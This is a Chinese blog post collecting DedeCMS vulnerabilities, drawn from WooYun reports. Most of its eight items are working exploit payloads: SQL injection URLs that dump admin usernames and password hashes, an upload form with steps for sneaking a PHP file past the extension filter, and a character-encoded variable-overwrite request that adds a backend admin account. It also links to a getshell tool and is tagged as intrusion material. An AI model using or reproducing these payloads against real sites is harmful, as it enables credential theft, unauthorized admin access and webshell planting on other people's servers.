织梦最新漏洞收集

1、http://www.123.com/plus/feedback.php?aid=11552    【http://www.wooyun.org/bugs/wooyun-2013-017816
POC:http://www.123.com/plus/feedback.php?validate=ZFCU&action=send&comtype=comments&fid=1&isconfirm=yes&msg=90sec&typeid=0%27%2C%273%27%2C%274%27%2C%275%27%2C%270%27%2C%271351739660%27%2C+%270%27%2C%270%27%2C%270%27%2C%270%27%2C%270%27%2C%27aaaaaa%27%29%2C+%28%2711552%27%2C%272%27%2C@%60%27%60%2C%274%27%2C%275%27%2C%271%27%2C%271351739660%27%2C+%270%27%2C%270%27%2C%270%27%2C%270%27%2C%270%27%2C%28SELECT+concat%28uname%2C0x5f%2Cpwd%2C0x5f%29+FROM+%60%23@__admin%60+limit+3%2C1%29%29%23

 

2、http://www.123.com/plus/search.php?keyword=as    【http://www.wooyun.org/bugs/wooyun-2013-017613
POC:http://www.123.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

 

3、http://www.123.com/member/ajax_membergroup.php    【若有漏洞则可直接爆出管理账号】
POC:http://www.123.com/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`

 

4、上传漏洞脚本(要求网站开启新会员注册,注册并登陆,无需通过邮件验证)

XML/HTML代码
  1. <form action="http://www.123.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">  
  2.     file:<input name="uploadfile" type="file" /><br>  
  3.     newname:<input name="newname" type="text" value="help.Php"/>  
  4.      <button class="button2" type="submit">提交</button><br><br>  
  5. 1,必须登陆用户。<br>  
  6. 2,将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。<br>  
  7. 3,newname为上传后的新文件名,扩展名使用大写绕过,如“Php”。<br>  
  8. </form>  

 

5、/data/mysql_error_trace.inc 泄露后台与相关信息,详见(http://www.wooyun.org/bugs/wooyun-2013-022534)

 

6、http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

直接覆盖添加后台登录用户spider密码admin,v57和v57 sp1测试可成功(http://zone.wooyun.org/content/4164)

 

7、http://www.123.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23%22;

 

8、由dedecms变量覆盖漏洞引起的getshell exp (http://zone.wooyun.org/content/4231

工具下载:http://pan.baidu.com/share/link?shareid=2403045450&uk=587894688

Tags: dedecms, 入侵, 网站

« 上一篇 | 下一篇 »

只显示10条记录相关文章

HTTP状态表 (浏览: 6067, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 10078, 评论: 0)
织梦CMS密码加密方式分析 (浏览: 5960, 评论: 0)
最土团购程序后台登陆漏洞 (浏览: 16136, 评论: 0)
80sec感恩节事件分析 (浏览: 5549, 评论: 0)
Magic WinMail Server漏洞 (浏览: 5790, 评论: 0)
常见虚拟主机目录对照 (浏览: 5776, 评论: 0)
巧用BigDump工具导入超大MySQL数据库 (浏览: 7106, 评论: 0)
南方数据、良精系统、网软天下通杀漏洞 (浏览: 7778, 评论: 0)
对搜狐、网易和TOM三大门户网站的SQL注入漏洞检测 (浏览: 7393, 评论: 0)

Trackbacks

点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5

发表评论

评论内容 (必填):